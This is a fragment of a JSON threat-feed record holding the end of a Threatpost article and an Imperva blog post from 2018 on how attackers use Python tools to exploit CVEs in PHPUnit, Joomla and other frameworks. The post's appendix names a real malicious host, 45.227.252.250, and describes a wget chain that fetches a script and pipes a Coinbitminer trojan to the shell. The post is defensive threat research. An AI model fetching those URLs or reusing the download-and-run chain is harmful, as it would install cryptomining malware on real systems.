[WordPress](<https://threatpost.com/severe-php-exploit-threatens-wordpress-sites-with-remote-code-execution/136649/>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/27152016/Python-exploits.png>)\n\nFrameworks targeted by Python.\n\n\u201cThe advantages of Python as a coding language make it a popular tool for implementing known exploits,\u201d Imperva said. It noted the prevalence especially of exploits for the [CVE-2017-9841](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9841>) PHP-based remote code-execution (RCE) vulnerability in the PHPUnit framework, and [CVE-2015-8562](<https://nvd.nist.gov/vuln/detail/CVE-2015-8562>) RCE flaw in the Joomla! framework.\n\n\u201cSince Python is so widely used by hackers, there is a host of different attack vectors to take into consideration,\u201d Imperva noted. \u201cPython requires minimal coding skills, making it easy to write a script and exploit a vulnerability.\u201d\n", "modified": "2018-09-27T20:08:07", "published": "2018-09-27T20:08:07", "id": "THREATPOST:9475C86517671FDF8D35E7E89FB91463", "href": "https://threatpost.com/threatlist-hackers-turn-to-python-as-attack-coding-language-of-choice/137757/", "type": "threatpost", "title": "Threatlist: Hackers Turn to Python as Attack Coding Language of Choice", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2018-11-25T17:36:07", "bulletinFamily": "blog", "description": "\n\nPython will soon be the world\u2019s most prevalent coding language. \n\nThat\u2019s quite a statement, but if you look at its simplicity, flexibility and the relative ease with which folks pick it up, it\u2019s not hard to see why [The Economist](<https://www.economist.com/graphic-detail/2018/07/26/python-is-becoming-the-worlds-most-popular-coding-language>) recently touted it as the soon-to-be most used language, globally. Naturally, our threat research team had to poke around and see how popular Python is among bad actors. \n\nAnd the best place to do that, well, [Github](<https://github.com/>), of course. Roughly estimating, more than 20% of GitHub repositories that implement an attack tool / exploit PoC are written in Python. In virtually every security-related topic in GitHub, the majority of the repositories are written in Python, including tools such as [w3af](<https://github.com/andresriancho/w3af>) , [Sqlmap](<https://github.com/sqlmapproject/sqlmap>), and even the infamous [AutoSploit](<https://www.imperva.com/>) tool.\n\nAt [Imperva](<https://www.imperva.com/>), we use an advanced intelligent [Client Classification](<https://www.incapsula.com/blog/how-incapsula-client-classification-challenges-bots.html>) mechanism that distinguishes and classifies various web clients. When we take a look at our data, specifically security incidents, the majority of the clients (>25%) we identify -- excluding vulnerability scanners -- are based on [Python](<https://github.com/topics/security?l=python>). \n\nUnlike other clients, in Python, we see a host of different attack vectors and the usage of known exploits. Hackers, like developers, enjoy Python\u2019s advantages which makes it a popular hacking tool.\n\n Figure 1: Security incidents by client, excluding vulnerability scanners. More than 25% of the clients were Python-based tools used by malicious actors, making it the most common vector for launching exploit attempts.\n\n**When examining the use of Python** in attacks against sites we protect, the result was unsurprising - a large chunk, up to 77%, of the sites were attacked by a Python-based tool, and in over a third of the cases a Python-based tool was responsible for the majority of daily attacks. These levels, over time, show that Python-based tools are used for both breadth and depth scanning. \n\n Figure 2: Daily percentage of sites suffering Python-based attacks\n\n## **Python Modules**\n\nThe two most popular Python modules used for web attacks are Urllib and Python Requests. The chart below shows attack distribution. Use of the new module, Async IO, is just kicking off, which makes perfect sense when you consider the vast possibilities the library offers in the field of [layer 7 DDoS](<https://www.imperva.com/app-security/threatglossary/ddos-attacks/>); especially when using a \u201cSpray N\u2019 Pray\u201d technique: \n\n\n## **Python and Known Exploits**\n\nThe advantages of Python as a coding language make it a popular tool for implementing known exploits. We collected information on the top 10 vulnerabilities recently used by a Python-based tool, and we don\u2019t expect it to stop.\n\nThe two most popular attacks in the last 2 months used CVE-2017-9841 - a PHP based Remote Code Execution (RCE) vulnerability in the PHPUnit framework, and CVE-2015-8562 which is a RCE against the Joomla! Framework. It isn\u2019t surprising that the most common attacks had RCE potential, considering how valuable it is to malicious actors.\n\nAnother example, which isn't in the top 10, is CVE-2018-1000207, which had hundreds of attacks each day for several days during the last week of August 2018. Deeper analysis shows that the attack was carried out on multiple protected customers, by a group of IPs from China.\n\n## **CVEs over time**\n\n \nYou can see that the number of CVEs which are being used by attackers, according to our data, has increased in the last few years: \n \nIn addition, Python is used to target specific applications and frameworks - below you can find the top 10, according to our data: \n \nWhen we looked at all the frameworks targeted by Python, the attacks that stand out are those aimed at Struts, WordPress, Joomla and Drupal, which is not surprising as these are currently [some of the most popular frameworks](<https://websitesetup.org/popular-cms/>) out there.\n\n## **Attack vectors**\n\nThe most popular HTTP parameter value we\u2019ve seen used in attacks, responsible for around 30% of all different param values used, belongs to a backdoor upload attempt through a PHP Unserialize vulnerability in Joomla! using the JDatabaseDriverMysqli object. The backdoor uploaded payload is hosted on [ICG-AuthExploiterBot](<https://github.com/04x/ICG-AutoExploiterBoT>).\n\nWe\u2019ve also seen a recurring payload that turned out to be a Coinbitminer infection attempt, more details on that are in the appendix -- note, the appendix is only meant as an example. Since Python is so widely used by hackers, there is a host of different attack vectors to take into consideration. Python requires minimal coding skills, making it easy to write a script and exploit a vulnerability.\n\n### **Our recommendation**\n\nUnless you can differentiate between requests from Python-based tools and any other tool, our recommendations stay the same - make sure to keep security in mind when developing, keep your system up to date with patches, and refrain from any practice that is considered insecure.\n\n## Appendix - Example of an Attack \n\n### Here\u2019s an interesting, recurring payload we\u2019ve observed (with a small variance at the end):\n\n \nAfter base64 decoding it, we get a binary payload: \n \nIn the above payload, there is a mention of a GitHub repository for a deserialization exploitation tool and a wget command download in a jpg file, which strongly suggests there is malicious activity. After downloading the file from http://45.227.252.250/jre.jpg we can see that it\u2019s actually a script containing the following: \n \nThe two last lines in the script try to get http://45.227.252.250/static/font.jpg%7Csh, which is identified as Trojan. Coinbitminer by Symantec Endpoint Protection. \n \nThis finding relates to [a tweet from the end of August](<https://twitter.com/ryancbarnett/status/1033110659259662338>) 2018, talking about a new Apache Struts vulnerability CVE-2018-11776 used to infect with the same Coinbitminer. \n**While you're here, also read: [Imperva Python SDK \u2013 We\u2019re All Consenting SecOps Here](<https://www.imperva.com/blog/2018/05/imperva-python-sdk-were-all-consenting-secops-here/>)**\n\nThe post [The World's Most Popular Coding Language Happens to be Most Hackers' Weapon of Choice](<https://www.imperva.com/blog/the-worlds-most-popular-coding-language-happens-to-be-most-hackers-weapon-of-choice/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2018-09-26T16:18:36", "published": "2018-09-26T16:18:36", "id": "IMPERVABLOG:F2DBFC086ED3B70700CD22E02FB39FC8", "href": "https://www.imperva.com/blog/the-worlds-most-popular-coding-language-happens-to-be-most-hackers-weapon-of-choice/", "type": "impervablog", "title": "The World\u2019s Most Popular Coding Language Happens to be Most Hackers\u2019 Weapon of Choice", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}